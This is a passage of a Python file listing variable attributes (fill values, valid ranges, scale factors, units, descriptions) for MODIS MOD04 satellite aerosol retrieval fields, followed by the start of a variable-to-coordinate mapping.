'Optical_Depth_Small_Average_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Small_Average_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'AOT at 7 bands for small mode of average solution'},
'Optical_Depth_Small_Best_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Small_Best_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'AOT at 7 bands for small mode of best solution'},
'Effective_Optical_Depth_Average_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Effective_Optical_Depth_Average_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'AOT at seven bands for average solution'},
'Effective_Optical_Depth_Best_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Effective_Optical_Depth_Best_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'AOT at seven bands for best solution'},
'Solution_Index_Ocean_Large_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Solution_Index_Ocean_Large', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([5, 9], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Solution Number index large particles'},
'Solution_Index_Ocean_Small_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Solution_Index_Ocean_Small', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([1, 4], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Solution Number index small particles'},
'Quality_Assurance_Crit_Ref_Land_mod04': {'hdfeos_name': 'Quality_Assurance_Crit_Ref_Land', '_FillValue': np.array([0], dtype=np.int8), 'valid_range': np.array([ 0, -1], dtype=np.int8), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Runtime QA flags'},
'Quality_Assurance_Land_mod04': {'hdfeos_name': 'Quality_Assurance_Land', '_FillValue': np.array([0], dtype=np.int8), 'valid_range': np.array([ 0, -1], dtype=np.int8), 'Geolocation_Pointer': 'Internal geolocation arrays', 'description': 'see MODIS atmosphere QA plan for details', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Runtime QA flags'},
'STD_Reflectance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'STD_Reflectance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 20000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Standard deviation of reflectance at five bands'},
'Mean_Reflectance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Mean_Reflectance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 10000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Mean reflectance at five bands'},
'Number_Pixels_Percentile_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Number_Pixels_Percentile_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 400], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Number of pixels with desired percentile'},
'Optical_Depth_Ratio_Small_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Ratio_Small_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Small mode aerosol fraction'},
'Cloud_Fraction_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Cloud_Fraction_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 100], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Cloud fraction (%)'},
'Transmitted_Flux_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Transmitted_Flux_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Normalized Transmitted flux at 0.47 and 0.66 micron'},
'Reflected_Flux_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Reflected_Flux_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Normalized reflected flux at 0.47, 0.55, and 0.66 micron'},
'Angstrom_Exponent_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Angstrom_Exponent_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([-500, 3000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Angstrom exponent for 0.47 and 0.67 micron'},
'Mass_Concentration_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Mass_Concentration_Land', '_FillValue': np.array([-999.], dtype=np.float32), 'valid_range': np.array([ 0., 1000.], dtype=np.float32), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': '1.0e-6g/cm^2', 'long_name': 'Mass concentration'},
'Estimated_Uncertainty_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Estimated_Uncertainty_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 20000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Uncertainty of optical thickness at 0.47 and 0.66 micron'},
'Corrected_Optical_Depth_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Corrected_Optical_Depth_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Corrected optical thickness at 0.47, 0.55 and 0.66 micron'},
'Continental_Optical_Depth_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Continental_Optical_Depth_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Continental optical thickness at 0.47, and 0.66 micron'},
'Aerosol_Type_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Aerosol_Type_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([0, 3], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Aerosol Type'},
'QualityWeight_Critical_Reflectance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'QualityWeight_Critical_Reflectance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([-20, 20], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Quality Flag forCritical_Reflectance based on the Test for fits'},
'QualityWeight_Path_Radiance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'QualityWeight_Path_Radiance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([-20, 20], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Quality Flag for Path Radiance based on the Test for fits'},
'Error_Critical_Reflectance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Error_Critical_Reflectance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Uncertainty Critical_Reflectance of 0.47 and 0.66 micron'},
'Critical_Reflectance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Critical_Reflectance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 10000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Critical_Reflectances at 0.47 and 0.66 micron'},
'Error_Path_Radiance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Error_Path_Radiance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([9.999999747378751e-05]), 'scale_factor': np.array([0.]), 'units': 'None', 'long_name': 'Uncertainty of the Path Radiance at 0.47, and 0.66 micron'},
'Path_Radiance_Land_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Path_Radiance_Land', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 10000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Path Radiance at 0.47, and 0.66 micron'},
'Standard_Deviation_Reflectance_Land_All_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Standard_Deviation_Reflectance_Land_All', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 10000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Std Dev of Ref at 0.47, 0.66, and 2.1 micron after cloud screening'},
'Mean_Reflectance_Land_All_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Mean_Reflectance_Land_All', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 10000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Average of Ref at 0.47, 0.66, and 2.1 micron after cloud screening'},
'Reflected_Flux_Land_And_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Reflected_Flux_Land_And_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Normalized reflected flux at 0.55 micron'},
'Optical_Depth_Ratio_Small_Land_And_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Ratio_Small_Land_And_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Ratio of small mode optical depth at 0.55 micron'},
'Optical_Depth_Land_And_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Land_And_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'AOT at 0.55 micron for both ocean (best) and land (corrected)'},
'Scattering_Angle_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Scattering_Angle', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 18000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.009999999776482582]), 'units': 'Degrees', 'long_name': 'Scattering Angle'},
'Cloud_Mask_QA_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Cloud_Mask_QA', '_FillValue': np.array([0], dtype=np.int8), 'valid_range': np.array([ 0, -1], dtype=np.int8), 'Geolocation_Pointer': 'Internal geolocation arrays', 'description': '\n\nCloud_mask_QA flags: \n \n \nQA Flag Name Number of Bit Value Description \n Bits \n--------------------------------------------------------------\nCloud Mask 1 0 Undetermined \n 1 Determined \n \nCloud Mask 2 0 0-25% Cloudy pixels \nQuality Flag 1 25-50% cloudy pixels\n 2 50-75% cloudy pixels\n 3 75-100%cloudy pixels\n \nDay/Night 1 0 Night \nflag 1 Day \n \nSun glint 1 0 Yes \nflag 1 No \n \nSnow/Ice flag 1 0 Yes \n 1 No \n \nLand/Water 2 0 Water (ocean) \nflag 1 Coastal \n 2 Desert \n 3 Land \n---------------------- 1 byte total --------------------------', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'MODIS Input', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Cloud Mask info on 10x10 km resolution'},
'Sensor_Azimuth_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Sensor_Azimuth', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([-18000, 18000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'MODIS Input', 'add_offset': np.array([0.]), 'scale_factor': np.array([.009999999776482582]), 'units': 'Degrees', 'long_name': 'Sensor_Azimuth Angle, Cell to Sun'},
'Sensor_Zenith_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Sensor_Zenith', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 18000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'MODIS Input', 'add_offset': np.array([0.]), 'scale_factor': np.array([.009999999776482582]), 'units': 'Degrees', 'long_name': 'Sensor_Zenith Angle, Cell to Sun'},
'Solar_Azimuth_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Solar_Azimuth', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([-18000, 18000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'MODIS Input', 'add_offset': np.array([0.]), 'scale_factor': np.array([.009999999776482582]), 'units': 'Degrees', 'long_name': 'Solar_Azimuth Angle, Cell to Sun'},
'Solar_Zenith_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Solar_Zenith', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 18000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'MODIS Input', 'add_offset': np.array([0.]), 'scale_factor': np.array([.009999999776482582]), 'units': 'Degrees', 'long_name': 'Solar Zenith Angle, Cell to Sun'},
'Scan_Start_Time_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Scan_Start_Time', '_FillValue': np.array([-999.]), 'valid_range': np.array([0.00000000e+00, 3.155800064e+09]), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'MODIS Input', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'Seconds since 1993-1-1 00:00:00.0 0', 'long_name': 'TAI Time at Start of Scan replicated across the swath'},
'Latitude_mod04': {'long_name': 'latitude', 'units': 'degrees_north', 'hdfeos_name': 'Latitude', '_FillValue': np.array([-999.], dtype=np.float32)},
'Longitude_mod04': {'long_name': 'longitude', 'units': 'degrees_east', 'hdfeos_name': 'Longitude', '_FillValue': np.array([-999.], dtype=np.float32)}}
var_coordinates = {'MODIS_Band_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'MODIS_Band_Land_mod04': ['MODIS_Band_Land_mod04'], 'Solution_Index_mod04': ['Solution_Index_mod04'], 'Solution_Ocean_mod04': ['Solution_Ocean_mod04'], 'Solution_3_Land_mod04': ['Solution_3_Land_mod04'], 'Solution_2_Land_mod04': ['Solution_2_Land_mod04'], 'Solution_1_Land_mod04': ['Solution_1_Land_mod04'], 'Quality_Assurance_Ocean_mod04': [], 'STD_Reflectance_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Mean_Reflectance_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Number_Pixels_Used_Ocean_mod04': [], 'Cloud_Fraction_Ocean_mod04': [], 'Optical_Depth_by_models_ocean_mod04': ['Solution_Index_mod04'], 'Optical_Depth_Ratio_Small_Ocean_0_86micron_mod04': ['Solution_Ocean_mod04'], 'Least_Squares_Error_Ocean_mod04': ['Solution_Ocean_mod04'], 'Transmitted_Flux_Average_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Transmitted_Flux_Best_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Reflected_Flux_Average_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Reflected_Flux_Best_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Angstrom_Exponent_2_Ocean_mod04': ['Solution_Ocean_mod04'], 'Angstrom_Exponent_1_Ocean_mod04': ['Solution_Ocean_mod04'], 'Backscattering_Ratio_Average_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Backscattering_Ratio_Best_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Asymmetry_Factor_Average_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Asymmetry_Factor_Best_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Cloud_Condensation_Nuclei_Ocean_mod04': ['Solution_Ocean_mod04'], 'Effective_Radius_Ocean_mod04': ['Solution_Ocean_mod04'], 'Mass_Concentration_Ocean_mod04': ['Solution_Ocean_mod04'], 'Optical_Depth_Large_Average_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Optical_Depth_Large_Best_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Optical_Depth_Small_Average_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Optical_Depth_Small_Best_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Effective_Optical_Depth_Average_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Effective_Optical_Depth_Best_Ocean_mod04': ['MODIS_Band_Ocean_mod04'], 'Solution_Index_Ocean_Large_mod04': ['Solution_Ocean_mod04'], 'Solution_Index_Ocean_Small_mod04': ['Solution_Ocean_mod04'], 'Quality_Assurance_Crit_Ref_Land_mod04': [], 'Quality_Assurance_Land_mod04': [], 'STD_Reflectance_Land_mod04': ['MODIS_Band_Land_mod04'], 'Mean_Reflectance_Land_mod04': ['MODIS_Band_Land_mod04'], 'Number_Pixels_Percentile_Land_mod04': ['Solution_1_Land_mod04'], 'Optical_Depth_Ratio_Small_Land_mod04': [], 'Cloud_Fraction_Land_mod04': [], 'Transmitted_Flux_Land_mod04': ['Solution_1_Land_mod04'], 'Reflected_Flux_Land_mod04': ['Solution_2_Land_mod04'], 'Angstrom_Exponent_Land_mod04': [], 'Mass_Concentration_Land_mod04': [], 'Estimated_Uncertainty_Land_mod04': ['Solution_1_Land_mod04'], 'Corrected_Optical_Depth_Land_mod04': ['Solution_2_Land_mod04'], 'Continental_Optical_Depth_Land_mod04': ['Solution_1_Land_mod04'], 'Aerosol_Type_Land_mod04': [], 'QualityWeight_Critical_Reflectance_Land_mod04': ['Solution_1_Land_mod04'], 